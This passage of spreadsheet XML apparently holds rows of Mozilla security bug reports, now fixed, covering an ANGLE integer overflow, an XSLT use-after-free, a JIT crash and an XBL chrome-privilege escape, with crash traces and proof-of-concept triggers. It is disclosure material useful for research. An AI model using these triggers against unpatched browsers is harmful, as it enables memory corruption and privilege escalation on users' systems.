Note also that the idea of "let's have another webhead just for internal requests" won't work on Heroku, where you cannot differentiate between webheads like that (and worker nodes cannot open web-facing ports).</t>
        </is>
      </c>
      <c r="X4715" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4716">
      <c r="A4716" t="n">
        <v>890277</v>
      </c>
      <c r="B4716" t="inlineStr">
        <is>
          <t>2013-07-04 07:00:10 -0700</t>
        </is>
      </c>
      <c r="C4716" t="inlineStr">
        <is>
          <t>ANGLE libGLESv2 Integer Overflow</t>
        </is>
      </c>
      <c r="D4716" t="inlineStr">
        <is>
          <t>2024-05-30 08:05:09 -0700</t>
        </is>
      </c>
      <c r="E4716" t="n">
        <v>1</v>
      </c>
      <c r="F4716" t="n">
        <v>1</v>
      </c>
      <c r="G4716" t="n">
        <v>3</v>
      </c>
      <c r="H4716" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4716" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4716" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4716" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4716" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4716" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4716" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4716" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4716" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q4716" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4716" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4716" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T4716" t="n">
        <v>1</v>
      </c>
      <c r="U4716" t="n">
        <v>0</v>
      </c>
      <c r="V4716" t="n">
        <v>36</v>
      </c>
      <c r="W4716" t="inlineStr">
        <is>
          <t>Created attachment 771351
Crash trigger
Description:		Almost Native Graphics Layer Engine (ANGLE) library Integer Overflow
Versions Affected: 	Mozilla Firefox 22.0, Mozilla Nightly 25.0a1 (2013-07-03)
Category: 		Memory Corruption
Reporter:		Alex Chapman of Context Information Security 
Summary:
--------
The Almost Native Graphics Layer Engine (ANGLE) library as used in Mozilla Firefox is vulnerable to an integer overflow vulnerability leading to memory corruption which may allow an attacker to exploit the browser process. The ANGLE library is used by Firefox on Windows as a bridge between the OpenGL ES 2.0 API and DirectX.
Note: As this is a bug in the ANGLE library a bug report has also been submitted to Google.
Analysis:
---------
The issue occurs due to insufficient bounds checking prior to integer multiplication within the Context::drawLineLoop function (libGLESv2/Context.cpp):
    const int spaceNeeded = (count + 1) * sizeof(unsigned int);
    if (!mLineLoopIB)
    {
        mLineLoopIB = new StreamingIndexBuffer(mDevice, INITIAL_INDEX_BUFFER_SIZE, D3DFMT_INDEX32);
    }
    if (mLineLoopIB)
    {
        mLineLoopIB-&gt;reserveSpace(spaceNeeded, GL_UNSIGNED_INT);
        UINT offset = 0;
        unsigned int *data = static_cast&lt;unsigned int*&gt;(mLineLoopIB-&gt;map(spaceNeeded, &amp;offset));
        startIndex = offset / 4;
        if (data)
        {
            switch (type)
            {
              case GL_NONE:   // Non-indexed draw
                for (int i = 0; i &lt; count; i++)
                {
                    data[i] = i;
                }
                data[count] = 0;
                break;
The count variable is directly controlled from javascript with no validation performed by the ANGLE library. Context::drawLineLoop proceeds to request a buffer using the overflowed spaceNeeded variable as the size, and fill the insufficiently allocated memory with data resulting in a heap overflow condition.
Example crash information from Firefox 22.0:
    (1788.17d4): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=06723000 ebx=7fffffff ecx=00218800 edx=0057d160 esi=0286a368 edi=00000000
    eip=69075035 esp=0057d174 ebp=0057d188 iopl=0         nv up ei ng nz ac po cy
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210293
    libGLESv2!gl::Context::drawLineLoop+0x123:
    69075035 890c88          mov     dword ptr [eax+ecx*4],ecx ds:002b:06f85000=????????
    ChildEBP RetAddr  Args to Child              
    0057d188 69074d23 00000000 00000000 00000000 libGLESv2!gl::Context::drawLineLoop+0x123 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\gfx\angle\src\libglesv2\context.cpp @ 3250]
    0057d1b4 6907a5c7 00000002 00000000 7fffffff libGLESv2!gl::Context::drawArrays+0xee [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\gfx\angle\src\libglesv2\context.cpp @ 3105]
    0057d1ec 61c2d9a2 00000002 00000000 7fffffff libGLESv2!glDrawArrays+0x4d [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\gfx\angle\src\libglesv2\libglesv2.cpp @ 16707566]
    0057d200 62026f18 0fae7400 00000002 00000000 xul!mozilla::gl::GLContext::fDrawArrays+0x17 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\glcontext.h @ 685]
    0057d238 62029022 0bf4a6a0 00000002 00000000 xul!mozilla::WebGLContext::DrawArrays+0x123 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\canvas\src\webglcontextgl.cpp @ 1472]
    0057d25c 61e59774 0c064600 0057d29c 0bf4a6a0 xul!mozilla::dom::WebGLRenderingContextBinding::drawArrays+0x83 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 5502]
    0057d28c 6a9f9515 0c064600 00000003 057d4190 xul!mozilla::dom::WebGLRenderingContextBinding::genericMethod+0xcd [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 10325]
    0057d2e8 6a9e75ea 0c064600 00000000 04ca0070 mozjs!js::InvokeKernel+0x115 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\jsinterp.cpp @ 390]
In addition to the above issue, a bug in the NVIDIA graphics driver (version information in gfx_driver_version.txt) and insufficient validation of the size of allocated memory returned by a call to IDirect3DDevice9::CreateIndexBuffer in StreamingIndexBuffer::reserveSpace (libGLESv2/IndexDataManager.cpp) can also trigger a similar heap overflow condition. With the buggy NVIDIA driver, calls to IDirect3DDevice9::CreateIndexBuffer with large memory sizes (e.g. 0xFFFF0004) fail to allocate the requested amount of memory, but return a success result (HRESULT 0). Subsequent code in StreamingIndexBuffer::reserveSpace does not check the size of memory allocated before returning the buffer to the Context::drawLineLoop function (libGLESv2/Context.cpp) to be used. Context::drawLineLoop proceeds to fill the insufficiently allocated memory with data, assuming a successful memory allocation, resulting in a heap overflow condition: 
Example crash information from Friefox 22.0:
    (15b8.2280): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=06756000 ebx=3fffc000 ecx=001c2c00 edx=004ed6a0 esi=02afa9f0 edi=00000000
    eip=690c5035 esp=004ed6b4 ebp=004ed6c8 iopl=0         nv up ei ng nz na pe cy
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210287
    libGLESv2!gl::Context::drawLineLoop+0x123:
    690c5035 890c88          mov     dword ptr [eax+ecx*4],ecx ds:002b:06e61000=????????
    ChildEBP RetAddr  Args to Child              
    004ed6c8 690c4d23 00000000 00000000 00000000 libGLESv2!gl::Context::drawLineLoop+0x123 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\gfx\angle\src\libglesv2\context.cpp @ 3250]
    004ed6f4 690ca5c7 00000002 00000000 3fffc000 libGLESv2!gl::Context::drawArrays+0xee [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\gfx\angle\src\libglesv2\context.cpp @ 3105]
    004ed72c 61c2d9a2 00000002 00000000 3fffc000 libGLESv2!glDrawArrays+0x4d [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\gfx\angle\src\libglesv2\libglesv2.cpp @ 16707566]
    004ed740 62026f18 0c069400 00000002 00000000 xul!mozilla::gl::GLContext::fDrawArrays+0x17 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\glcontext.h @ 685]
    004ed778 62029022 0c1474f0 00000002 00000000 xul!mozilla::WebGLContext::DrawArrays+0x123 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\canvas\src\webglcontextgl.cpp @ 1472]
    004ed79c 61e59774 0c264600 004ed7dc 0c1474f0 xul!mozilla::dom::WebGLRenderingContextBinding::drawArrays+0x83 [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 5502]
    004ed7cc 6aa19515 0c264600 00000003 0552b2b0 xul!mozilla::dom::WebGLRenderingContextBinding::genericMethod+0xcd [e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 10325]
Proof of Concept:
-----------------
Enclosed in the zip file is a HTML file which triggers the interger overflow and subsequent heap corruption on affected browser versions on Windows systems.
* Expected Result of running angle_crash.html = No crash
* Actual Result of running angle_crash.html = Access violation - code c0000005 with heap corrupted</t>
        </is>
      </c>
      <c r="X4716" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4717">
      <c r="A4717" t="n">
        <v>1336828</v>
      </c>
      <c r="B4717" t="inlineStr">
        <is>
          <t>2017-02-05 13:23:34 -0800</t>
        </is>
      </c>
      <c r="C4717" t="inlineStr">
        <is>
          <t>UAF in nsAutoPtr destructor during XSLT processing</t>
        </is>
      </c>
      <c r="D4717" t="inlineStr">
        <is>
          <t>2024-05-30 09:25:40 -0700</t>
        </is>
      </c>
      <c r="E4717" t="n">
        <v>1</v>
      </c>
      <c r="F4717" t="n">
        <v>1</v>
      </c>
      <c r="G4717" t="n">
        <v>3</v>
      </c>
      <c r="H4717" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4717" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4717" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K4717" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4717" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4717" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4717" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4717" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4717" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q4717" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4717" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4717" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4717" t="n">
        <v>1</v>
      </c>
      <c r="U4717" t="n">
        <v>0</v>
      </c>
      <c r="V4717" t="n">
        <v>36</v>
      </c>
      <c r="W4717" t="inlineStr">
        <is>
          <t>Created attachment 8833799
XPCshell PoC
Tested under xpcshell "JavaScript-C54.0a1"
Note: the "match" attribute of the XSLT node "template" must match the name of the XML root tag
[+] Relevant parts
xml_str = '&lt;tag_name/&gt;';
xsl_str = '&lt;xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="42"&gt;' +
          ' &lt;xsl:variable name="var_name"&gt;&lt;xsl:template/&gt;&lt;/xsl:variable&gt;' +
          ' &lt;xsl:template match="tag_name[$var_name]"/&gt;' +
          '&lt;/xsl:stylesheet&gt;'
xml = parse_str(xml_str, 'text/xml');
xsl = parse_str(xsl_str, 'text/xml');
transform(xml, xsl);
[+] How to reproduce
$ ./poc_xslt_uaf_nsAutoPtr_dtor.js
==20218==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400003e410 at pc 0x7f2e219117be bp 0x7ffc99c5b7a0 sp 0x7ffc99c5b798
READ of size 8 at 0x60400003e410 thread T0
    #0 0x7f2e219117bd in ~nsAutoPtr /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:78:5
    #1 0x7f2e219117bd in txExecutionState::~txExecutionState() /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:99
    #2 0x7f2e2194a015 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:701:1
    #3 0x7f2e2194fbdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    #4 0x7f2e2194fbdb in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1297
    ...
0x60400003e410 is located 0 bytes inside of 40-byte region [0x60400003e410,0x60400003e438)
freed by thread T0 here:
    #0 0x4b20db in free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f2e21910697 in txExecutionState::~txExecutionState() /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:90:9
    #2 0x7f2e2194a015 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:701:1
    #3 0x7f2e2194fbdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    #4 0x7f2e2194fbdb in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1297
    ...
previously allocated by thread T0 here:
    #0 0x4b23fb in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4df2ad in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f2e21942bb2 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f2e21942bb2 in txToDocHandlerFactory::createHandlerWith(txOutputFormat*, txAXMLEventHandler**) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:93
    #4 0x7f2e21911d13 in txExecutionState::init(txXPathNode const&amp;, txOwningExpandedNameMap&lt;txIGlobalParameter&gt;*) /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:115:10
    #5 0x7f2e21949c01 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:672:19
    #6 0x7f2e2194fbdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    #7 0x7f2e2194fbdb in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1297
    ...</t>
        </is>
      </c>
      <c r="X4717" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4718">
      <c r="A4718" t="n">
        <v>1236519</v>
      </c>
      <c r="B4718" t="inlineStr">
        <is>
          <t>2016-01-04 06:05:05 -0800</t>
        </is>
      </c>
      <c r="C4718" t="inlineStr">
        <is>
          <t>Crash [@ isDerivedClassConstructor] or Assertion failure: isInterpretedLazy() &amp;&amp; u.i.s.lazy_, at jsfun.h:452</t>
        </is>
      </c>
      <c r="D4718" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:04 -0700</t>
        </is>
      </c>
      <c r="E4718" t="n">
        <v>1</v>
      </c>
      <c r="F4718" t="n">
        <v>1</v>
      </c>
      <c r="G4718" t="n">
        <v>3</v>
      </c>
      <c r="H4718" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4718" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4718" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4718" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4718" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4718" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4718" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4718" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4718" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main45+]</t>
        </is>
      </c>
      <c r="Q4718" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4718" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4718" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T4718" t="n">
        <v>1</v>
      </c>
      <c r="U4718" t="n">
        <v>0</v>
      </c>
      <c r="V4718" t="n">
        <v>18</v>
      </c>
      <c r="W4718" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision d7a0ad85d9fb (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug, run with --fuzzing-safe --no-threads --disable-oom-functions --ion-eager --baseline-eager --ion-extra-checks):
gcPreserveCode();
setJitCompilerOption("ion.warmup.trigger", 20);
DateTimeFormat =  newGlobal().Intl.DateTimeFormat;
new DateTimeFormat;
gc();
new DateTimeFormat;
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
isDerivedClassConstructor (this=0x7ffff7e97560) at js/src/jsfun.h:537
#0  isDerivedClassConstructor (this=0x7ffff7e97560) at js/src/jsfun.h:537
#1  js::jit::IonBuilder::createThis (this=this@entry=0x7ffff699c1a0, target=target@entry=0x7ffff7e97560, callee=0x7ffff69a2b90, newTarget=0x7ffff69a2b90) at js/src/jit/IonBuilder.cpp:6269
#2  0x00000000005922dc in js::jit::IonBuilder::makeCallHelper (this=this@entry=0x7ffff699c1a0, target=target@entry=0x7ffff7e97560, callInfo=...) at js/src/jit/IonBuilder.cpp:6719
#3  0x000000000059884c in js::jit::IonBuilder::makeCall (this=this@entry=0x7ffff699c1a0, target=target@entry=0x7ffff7e97560, callInfo=...) at js/src/jit/IonBuilder.cpp:6768
#4  0x00000000005ad1bb in js::jit::IonBuilder::jsop_call (this=this@entry=0x7ffff699c1a0, argc=&lt;optimized out&gt;, constructing=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:6585
#5  0x00000000005a8796 in js::jit::IonBuilder::inspectOpcode (this=this@entry=0x7ffff699c1a0, op=op@entry=JSOP_NEW) at js/src/jit/IonBuilder.cpp:1887
#6  0x00000000005a94a4 in js::jit::IonBuilder::traverseBytecode (this=this@entry=0x7ffff699c1a0) at js/src/jit/IonBuilder.cpp:1521
#7  0x00000000005a98c6 in js::jit::IonBuilder::build (this=0x7ffff699c1a0) at js/src/jit/IonBuilder.cpp:917
#8  0x00000000005b31e3 in js::jit::IonCompile (cx=cx@entry=0x7ffff6907800, script=&lt;optimized out&gt;, baselineFrame=baselineFrame@entry=0x0, osrPc=&lt;optimized out&gt;, constructing=&lt;optimized out&gt;, recompile=&lt;optimized out&gt;, optimizationLevel=js::jit::Normal) at js/src/jit/Ion.cpp:2213
#9  0x00000000005b3a8e in js::jit::Compile (cx=cx@entry=0x7ffff6907800, script=script@entry=..., osrFrame=osrFrame@entry=0x0, osrPc=osrPc@entry=0x0, constructing=&lt;optimized out&gt;, forceRecompile=forceRecompile@entry=false) at js/src/jit/Ion.cpp:2451
#10 0x00000000005b3d9b in js::jit::CanEnter (cx=cx@entry=0x7ffff6907800, state=...) at js/src/jit/Ion.cpp:2613
#11 0x0000000000870ef1 in js::RunScript (cx=cx@entry=0x7ffff6907800, state=...) at js/src/vm/Interpreter.cpp:383
#12 0x000000000087114f in js::Invoke (cx=cx@entry=0x7ffff6907800, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:478
#13 0x00000000004f3581 in IntlInitialize (cx=cx@entry=0x7ffff6907800, obj=..., obj@entry=..., initializer=..., locales=..., locales@entry=..., options=options@entry=...) at js/src/builtin/Intl.cpp:486
#14 0x00000000004fb70e in DateTimeFormat (cx=cx@entry=0x7ffff6907800, args=..., construct=&lt;optimized out&gt;) at js/src/builtin/Intl.cpp:1679
#15 0x00000000004fba90 in DateTimeFormat (cx=cx@entry=0x7ffff6907800, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/Intl.cpp:1691
#16 0x0000000000871630 in CallJSNative (args=..., native=0x4fba60 &lt;DateTimeFormat(JSContext*, unsigned int, JS::Value*)&gt;, cx=0x7ffff6907800) at js/src/jscntxtinlines.h:235
#17 CallJSNativeConstructor (args=..., native=0x4fba60 &lt;DateTimeFormat(JSContext*, unsigned int, JS::Value*)&gt;, cx=0x7ffff6907800) at js/src/jscntxtinlines.h:268
#18 InternalConstruct (cx=cx@entry=0x7ffff6907800, args=...) at js/src/vm/Interpreter.cpp:537
#19 0x0000000000871746 in js::Construct (cx=cx@entry=0x7ffff6907800, fval=..., fval@entry=..., args=..., newTarget=..., rval=...) at js/src/vm/Interpreter.cpp:586
#20 0x00000000007db7fa in js::DirectProxyHandler::construct (this=this@entry=0x183a390 &lt;js::CrossCompartmentWrapper::singleton&gt;, cx=cx@entry=0x7ffff6907800, proxy=..., proxy@entry=..., args=...) at js/src/proxy/DirectProxyHandler.cpp:95
#21 0x00000000007db994 in js::CrossCompartmentWrapper::construct (this=0x183a390 &lt;js::CrossCompartmentWrapper::singleton&gt;, cx=0x7ffff6907800, wrapper=..., args=...) at js/src/proxy/CrossCompartmentWrapper.cpp:309
#22 0x00000000007d7dda in js::Proxy::construct (cx=0x7ffff6907800, proxy=proxy@entry=..., args=...) at js/src/proxy/Proxy.cpp:410
#23 0x00000000007d87ff in js::proxy_Construct (cx=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/proxy/Proxy.cpp:692
#24 0x00000000008714da in CallJSNative (args=..., native=0x7d87a0 &lt;js::proxy_Construct(JSContext*, unsigned int, JS::Value*)&gt;, cx=0x7ffff6907800) at js/src/jscntxtinlines.h:235
#25 CallJSNativeConstructor (args=..., native=0x7d87a0 &lt;js::proxy_Construct(JSContext*, unsigned int, JS::Value*)&gt;, cx=0x7ffff6907800) at js/src/jscntxtinlines.h:268
#26 InternalConstruct (cx=cx@entry=0x7ffff6907800, args=...) at js/src/vm/Interpreter.cpp:549
#27 0x0000000000871746 in js::Construct (cx=cx@entry=0x7ffff6907800, fval=..., fval@entry=..., args=..., newTarget=..., newTarget@entry=..., rval=..., rval@entry=...) at js/src/vm/Interpreter.cpp:586
#28 0x00000000005265b9 in js::jit::DoCallFallback (cx=0x7ffff6907800, frame=0x7fffffffd228, stub_=0x7ffff53da258, argc=0, vp=0x7fffffffd1d8, res=...) at js/src/jit/BaselineIC.cpp:6164
#29 0x00007ffff7ff0bf4 in ?? ()
[...]
#39 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7ffff699c1a0	140737330659744
rcx	0x7ffff69a2b90	140737330686864
rdx	0x7ffff69a2b90	140737330686864
rsi	0x7ffff7e97560	140737352660320
rdi	0x7ffff699c1a0	140737330659744
rbp	0x7ffff69a2b90	140737330686864
rsp	0x7fffffffc290	140737488339600
r8	0x286	646
r9	0x91f0	37360
r10	0x7ffff7e97000	140737352658944
r11	0xd	13
r12	0x7ffff69a2b90	140737330686864
r13	0x7ffff69a2d08	140737330687240
r14	0x7ffff699c1a0	140737330659744
r15	0xfffffffffffffff8	-8
rip	0x591fa5 &lt;js::jit::IonBuilder::createThis(JSFunction*, js::jit::MDefinition*, js::jit::MDefinition*)+53&gt;
=&gt; 0x591fa5 &lt;js::jit::IonBuilder::createThis(JSFunction*, js::jit::MDefinition*, js::jit::MDefinition*)+53&gt;:	movzbl 0x2f(%rax),%eax
   0x591fa9 &lt;js::jit::IonBuilder::createThis(JSFunction*, js::jit::MDefinition*, js::jit::MDefinition*)+57&gt;:	shr    $0x5,%al
Marking s-s because this involves the GC and in particular, GC code preservation.</t>
        </is>
      </c>
      <c r="X4718" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4719">
      <c r="A4719" t="n">
        <v>296397</v>
      </c>
      <c r="B4719" t="inlineStr">
        <is>
          <t>2005-06-02 08:31:20 -0700</t>
        </is>
      </c>
      <c r="C4719" t="inlineStr">
        <is>
          <t>obj.func.__proto__.__parent__ problem in chrome XBL</t>
        </is>
      </c>
      <c r="D4719" t="inlineStr">
        <is>
          <t>2007-09-27 21:22:11 -0700</t>
        </is>
      </c>
      <c r="E4719" t="n">
        <v>1</v>
      </c>
      <c r="F4719" t="n">
        <v>1</v>
      </c>
      <c r="G4719" t="n">
        <v>3</v>
      </c>
      <c r="H4719" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4719" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4719" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4719" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4719" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4719" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4719" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4719" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4719" t="inlineStr">
        <is>
          <t>[sg:fix] Bug details embargoed until August 1, 2005</t>
        </is>
      </c>
      <c r="Q4719" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4719" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4719" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4719" t="n">
        <v>1</v>
      </c>
      <c r="U4719" t="n">
        <v>0</v>
      </c>
      <c r="V4719" t="n">
        <v>58</v>
      </c>
      <c r="W4719" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
This is related to bug 294795.
&lt;marquee id="m"&gt;marquee&lt;/marquee&gt;
m = document.getElementById("m");
On Firefox 1.0.4 and Mozilla 1.7.8:
  m.init.__proto__.__parent__ is
  [object chrome://xbl-marquee/content/xbl-marquee.xml#marquee].
  m.init.__proto__.__parent__.__parent__ is
  [object nsXBLPrototypeScript compilation scope].
  s = new m.init.__proto__.__parent__.__parent__.Script("Components.stack");
  When chrome calls s.exec(), its code is executed with chrome privilege.
On Firefox trunk:
  m.init.__proto__.__parent__ is |null|.
There are testcases for Firefox 1.0.4 and Mozilla 1.7.8.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X4719" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4720">
      <c r="A4720" t="n">
        <v>1356558</v>
      </c>
      <c r="B4720" t="inlineStr">
        <is>
          <t>2017-04-14 05:40:53 -0700</t>
        </is>
      </c>
      <c r="C4720" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsViewManager::IsPainting</t>
        </is>
      </c>
      <c r="D4720" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:43 -0700</t>
        </is>
      </c>
      <c r="E4720" t="n">
        <v>1</v>
      </c>
      <c r="F4720" t="n">
        <v>1</v>
      </c>
      <c r="G4720" t="n">
        <v>3</v>
      </c>
      <c r="H4720" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4720" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4720" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4720" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L4720" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4720" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4720" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4720" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4720" t="inlineStr">
        <is>
          <t>[adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q4720" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4720" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4720" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4720" t="n">
        <v>1</v>
      </c>
      <c r="U4720" t="n">
        <v>0</v>
      </c>
      <c r="V4720" t="n">
        <v>47</v>
      </c>
      <c r="W4720" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox:
&lt;script&gt;
function start() {
	o2=document.createElement('iframe');
